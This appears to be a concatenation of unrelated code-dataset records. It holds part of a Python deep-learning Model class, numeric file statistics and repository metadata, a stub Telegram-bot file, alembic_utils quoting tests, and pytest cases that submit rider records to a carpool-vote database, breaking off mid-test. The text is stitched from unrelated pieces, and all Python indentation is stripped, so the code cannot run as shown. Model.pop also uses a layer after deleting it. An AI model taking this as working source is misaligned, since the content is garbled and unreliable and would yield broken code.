for v in self.trainable_variables:
trainable_params += v.output_tensor.size
params_details = 'Total params: %d\n'%(total_params)
params_details += 'Trainable params: %d\n'%(trainable_params)
params_details += 'Non-trainable params: %d\n' % (total_params-trainable_params)
return params_details
class Model():
def __init__(self, inputs=None,outputs=None):
self.inputs=inputs
self.outputs=outputs
self.train_loss = []
self.train_acc = []
self.valid_loss = []
self.valid_acc = []
self.process_bar_nums = 30
self.process_bar_trained = '='
self.process_bar_untrain = '*'
def topological_sort(self,input_layers,mode='forward'):
"""
Sort generic nodes in topological order using Kahn's Algorithm.
`feed_dict`: A dictionary where the key is a `Input` node and the value is the respective value feed to that node.
Returns a list of sorted nodes.
"""
G = {}
graph = []
if mode=='forward':
trainable_variables=[]
layers = [input_layers]
while len(layers) > 0:
n = layers.pop(0)
if n not in G:
G[n] = {'in': set(), 'out': set()}
for m in n.outbound_layers:
for var in m.variables:
if var.require_grads and var not in trainable_variables:
trainable_variables.append(var)
if m not in G:
G[m] = {'in': set(), 'out': set()}
G[n]['out'].add(m)
G[m]['in'].add(n)
layers.append(m)
S = set([input_layers])
while len(S) > 0:
n = S.pop()
graph.append(n)
for m in n.outbound_layers:
G[n]['out'].remove(m)
G[m]['in'].remove(n)
# if no other incoming edges add to S
if len(G[m]['in']) == 0:
S.add(m)
return graph, trainable_variables
elif mode=='backward':
layers = [input_layers]
while len(layers) > 0:
n = layers.pop(0)
if n not in G:
G[n] = {'in': set(), 'out': set()}
for m in n.inbounds:
if m not in G:
G[m] = {'in': set(), 'out': set()}
G[n]['out'].add(m)
G[m]['in'].add(n)
layers.append(m)
S = set([input_layers])
while len(S) > 0:
n = S.pop()
graph.append(n)
for m in n.inbounds:
G[n]['out'].remove(m)
G[m]['in'].remove(n)
# if no other incoming edges add to S
if len(G[m]['in']) == 0:
S.add(m)
return graph
def compile(self, optimizer, loss):
assert self.inputs is not None and self.outputs is not None
self.forward_graph,self.trainable_variables=self.topological_sort(self.inputs,mode='forward')
self.backward_graph=self.topological_sort(self.outputs,mode='backward')
self.loss = get_objective(loss)
self.optimizer = get_optimizer(optimizer)
def fit(self, X, Y, batch_size=64, epochs=20, shuffle=True, validation_data=None, validation_ratio=0.1,draw_acc_loss=False, draw_save_path=None):
if validation_data is None:
if 0. < validation_ratio < 1.:
split = int(X.shape[0] * validation_ratio)
valid_X, valid_Y = X[-split:], Y[-split:]
train_X, train_Y = X[:-split], Y[:-split]
validation_data = (valid_X, valid_Y)
else:
train_X, train_Y = X, Y
else:
valid_X, valid_Y = validation_data
train_X, train_Y = X, Y
for epoch in range(epochs):
mini_batches = get_batches(train_X, train_Y, batch_size, epoch, shuffle)
batch_nums = len(mini_batches)
training_size = train_X.shape[0]
batch_count = 0
trained_nums=0
print('\033[0;31m Epoch[%d/%d]' % (epoch + 1, epochs))
start_time = time.time()
for xs, ys in mini_batches:
batch_count += 1
trained_nums += xs.shape[0]
# forward
y_hat = self.predict(xs)
#backward
self.calc_gradients(y_hat,ys)
end_time = time.time()
gap = end_time - start_time
self.optimizer.update(self.trainable_variables)
batch_acc, batch_loss = self.__evaluate(y_hat, ys)
self.train_loss.append(batch_loss)
self.train_acc.append(batch_acc)
if validation_data is not None:
valid_acc, valid_loss = self.evaluate(valid_X, valid_Y,batch_size=batch_size)
self.valid_loss.append(valid_loss)
self.valid_acc.append(valid_acc)
if draw_acc_loss:
if len(self.train_loss) == 2:
plt.ion()
plt.figure(figsize=(6, 7))
plt.title('batch-size=' + str(batch_size) + ',Epochs=' + str(epochs))
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2)
if len(self.train_loss) > 1:
self.draw_training(ax1, ax2, draw_save_path, epoch)
trained_process_bar_nums = batch_count * self.process_bar_nums // batch_nums
process_bar = self.process_bar_trained * trained_process_bar_nums + '>' + self.process_bar_untrain * ( self.process_bar_nums - trained_process_bar_nums - 1)
if validation_data is not None:
print( '\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} -val_loss: {:.4f} -val_acc: {:.4f}'.format(trained_nums,training_size,process_bar, gap, gap*1000/batch_count,batch_loss, batch_acc, valid_loss, valid_acc), end='')
else:
print('\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} '.format(trained_nums,training_size,process_bar, gap,gap*1000/batch_count, batch_loss, batch_acc), end='')
print()
def predict(self, X, is_training=True):
self.inputs.input_tensor = X
for node in self.forward_graph:
node.forward(is_training=is_training)
y_hat = self.outputs.output_tensor
return y_hat
def calc_gradients(self,y_hat,y_true):
self.outputs.grads=self.loss.backward(y_hat,y_true)
for node in self.backward_graph:
node.backward()
def __evaluate(self,y_hat,y_true):
acc = self.loss.calc_acc(y_hat,y_true)
base_loss = self.loss.calc_loss(y_hat, y_true)
return acc,base_loss
def evaluate(self, X, Y, batch_size=None):
if batch_size is not None:
assert type(batch_size) is int
ep = 0
acc_list = []
loss_list = []
data_nums = X.shape[0]
while True:
sp = ep
ep = min(sp + batch_size, data_nums)
y_hat = self.predict(X[sp:ep], is_training=False)
acc = self.loss.calc_acc(y_hat,Y[sp:ep])
acc_list.append(acc)
base_loss = self.loss.calc_loss(y_hat, Y[sp:ep])
loss_list.append(base_loss)
if ep == data_nums:
acc = sum(acc_list) / len(acc_list)
base_loss = sum(loss_list) / len(loss_list)
break
else:
y_hat = self.predict(X, is_training=False)
acc = self.loss.calc_acc(y_hat,Y)
base_loss = self.loss.calc_loss(y_hat, Y)
regular_loss = 0
# for layer in self.layers:
# regular_loss+=layer.add_loss
return acc, base_loss
def draw_training(self, ax1, ax2, draw_save_path, epoch):
leg1 = ax1.get_legend()
ax1.plot(self.train_loss, color='blue', label='train')
if self.valid_loss:
ax1.plot(self.valid_loss, color='green', label='validation')
ax1.set_xlabel('iter')
ax1.set_ylabel('loss')
if leg1 is None:
ax1.legend(loc='best')
leg2 = ax2.get_legend()
ax2.plot(self.train_acc, color='red', label='train')
if self.valid_acc:
ax2.plot(self.valid_acc, color='yellow', label='validation')
ax2.set_xlabel('iter')
ax2.set_ylabel('acc')
if leg2 is None:
ax2.legend(loc='best')
plt.pause(0.1)
if draw_save_path is not None:
assert draw_save_path.__class__.__name__ == 'str'
draw_save_path = os.path.abspath(draw_save_path + '\\Epoch' + str(epoch))
plt.savefig(draw_save_path, dpi=300)
def pop(self, index=-1):
layer = self.layers.pop(index)
del layer
print('success delete %s layer' % (layer.__class__.__name__))
def save(self, save_path):
with open(save_path + '.pkl', 'wb') as f:
pickle.dump([self.forward_graph, self.backward_graph, self.optimizer, self.loss], f)
def load(self, model_path):
with open(model_path + '.pkl', 'rb') as f:
f_graph, b_graph, optimizer, loss = pickle.load(f)
self.forward_graph = f_graph
self.backward_graph = b_graph
self.optimizer = optimizer
self.loss = loss
def __str__(self):
bar_nums = 75
print('*' * bar_nums)
print('Layer(type)'.ljust(20),'Output Shape'.ljust(20) ,'Param'.ljust(12),'Connected to'.ljust(15))
print('#' * bar_nums)
total_params = 0
for layer in self.forward_graph:
if layer.name is not None:
layer_name = '%s (%s)'%(layer.name,layer.__class__.__name__)
else:
layer_name = str(layer.__class__.__name__)
params = layer.params_count()
total_params += params
first = True
if layer.inbounds:
for prev_layer in layer.inbounds:
if prev_layer.name is not None:
connected = prev_layer.name
else:
connected = prev_layer.__class__.__name__
if first:
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
first = False
else:
print(''.ljust(20),''.ljust(20), ''.ljust(12),connected.ljust(15))
else:
connected = '\n'
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
print('-' * bar_nums)
print('*' * bar_nums)
trainable_params = 0
for v in self.trainable_variables:
trainable_params += v.output_tensor.size
params_details = 'Total params: %d\n'%(total_params)
params_details += 'Trainable params: %d\n'%(trainable_params)
params_details += 'Non-trainable params: %d\n' % (total_params-trainable_params)
return params_details
| 35.483108
| 274
| 0.52466
| 2,571
| 21,006
| 4.04473
| 0.085959
| 0.01154
| 0.018463
| 0.009232
| 0.868545
| 0.860756
| 0.837965
| 0.830849
| 0.824118
| 0.824118
| 0
| 0.018685
| 0.363039
| 21,006
| 591
| 275
| 35.543147
| 0.75852
| 0.022184
| 0
| 0.856132
| 0
| 0.009434
| 0.05192
| 0
| 0
| 0
| 0
| 0
| 0.014151
| 1
| 0.058962
| false
| 0
| 0.016509
| 0
| 0.103774
| 0.061321
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30f80bae5194f798785c5a2c4e2135218f813f2f
| 39
|
py
|
Python
|
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
def callback_datas():
return None
| 9.75
| 21
| 0.692308
| 5
| 39
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 39
| 3
| 22
| 13
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
eb5dfe67b18cdb4f20d6da97bad44a66ee1d284b
| 697
|
py
|
Python
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 74
|
2020-04-30T09:28:15.000Z
|
2022-03-28T12:23:06.000Z
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 69
|
2020-05-06T12:29:01.000Z
|
2022-02-23T12:27:28.000Z
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 23
|
2020-05-06T12:12:36.000Z
|
2022-03-23T06:25:45.000Z
|
from alembic_utils.statement import coerce_to_quoted, coerce_to_unquoted
def test_coerce_to_quoted() -> None:
assert coerce_to_quoted('"public"') == '"public"'
assert coerce_to_quoted("public") == '"public"'
assert coerce_to_quoted("public.table") == '"public"."table"'
assert coerce_to_quoted('"public".table') == '"public"."table"'
assert coerce_to_quoted('public."table"') == '"public"."table"'
def test_coerce_to_unquoted() -> None:
assert coerce_to_unquoted('"public"') == "public"
assert coerce_to_unquoted("public") == "public"
assert coerce_to_unquoted("public.table") == "public.table"
assert coerce_to_unquoted('"public".table') == "public.table"
| 41
| 72
| 0.700143
| 87
| 697
| 5.275862
| 0.172414
| 0.22658
| 0.27451
| 0.217865
| 0.753813
| 0.753813
| 0.753813
| 0.753813
| 0.623094
| 0.623094
| 0
| 0
| 0.12769
| 697
| 16
| 73
| 43.5625
| 0.754934
| 0
| 0
| 0
| 0
| 0
| 0.278336
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0.166667
| true
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eb5e2f71c41a238447af46499bdfd6419df4c5bd
| 24,188
|
py
|
Python
|
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
import pytest
import pgdb
@pytest.fixture
def pgdbConn(dbhost, db, frontenduser):
return pgdb.connect(dbhost + ':' + db + ':' + frontenduser)
def generic_rider_insert(conn, args):
cursor=conn.cursor()
cursor.execute("""
SELECT * from carpoolvote.submit_new_rider (
%(IPAddress)s,
%(RiderFirstName)s,
%(RiderLastName)s,
%(RiderEmail)s,
%(RiderPhone)s,
%(RiderCollectionZIP)s,
%(RiderDropOffZIP)s,
%(AvailableRideTimesLocal)s,
%(TotalPartySize)s,
%(TwoWayTripNeeded)s,
%(RiderIsVulnerable)s,
%(RiderWillNotTalkPolitics)s,
%(PleaseStayInTouch)s,
%(NeedWheelchair)s,
%(RiderPreferredContact)s,
%(RiderAccommodationNotes)s,
%(RiderLegalConsent)s,
%(RiderWillBeSafe)s,
%(RiderCollectionAddress)s,
%(RiderDestinationAddress)s
)
""", args)
results=cursor.fetchone()
conn.commit()
return {'uuid' : results[0], 'error_code' : results[1], 'error_text' : results[2]}
def test_insert_rider_000_all_valid(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
cursor = pgdbConn.cursor()
cursor.execute("""SELECT status FROM carpoolvote.rider WHERE "UUID"=%(uuid)s """, {'uuid' : uuid})
results = cursor.fetchone()
assert results[0] == 'Pending'
def test_insert_rider_001_IPAddress_invalid(pgdbConn):
args = {
'IPAddress' : 'abcd',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_002_RiderCollectionZIP_invalid_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_003_RiderCollectionZIP_invalid_not_exists(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '00000',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_004_RiderCollectionZIP_invalid_not_number(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : 'abcd',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_005_RiderDropOffZIP_invalid_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_006_RiderDropOffZIP_invalid_not_found(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '00000',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_007_RiderDropOffZIP_invalid_not_number(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : 'abcd',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_008_AvailableRideTimesLocal_empty(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_009_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_010_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_011_AvailableRideTimesLocal_invalid_incomplete(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_012_AvailableRideTimesLocal_invalid_chronology(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T03:00/2018-10-01T02:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_013_AvailableRideTimesLocal_invalid_past(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2000-10-01T02:00/2000-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_014_TotalPartySize_invalid_zero(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '0',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
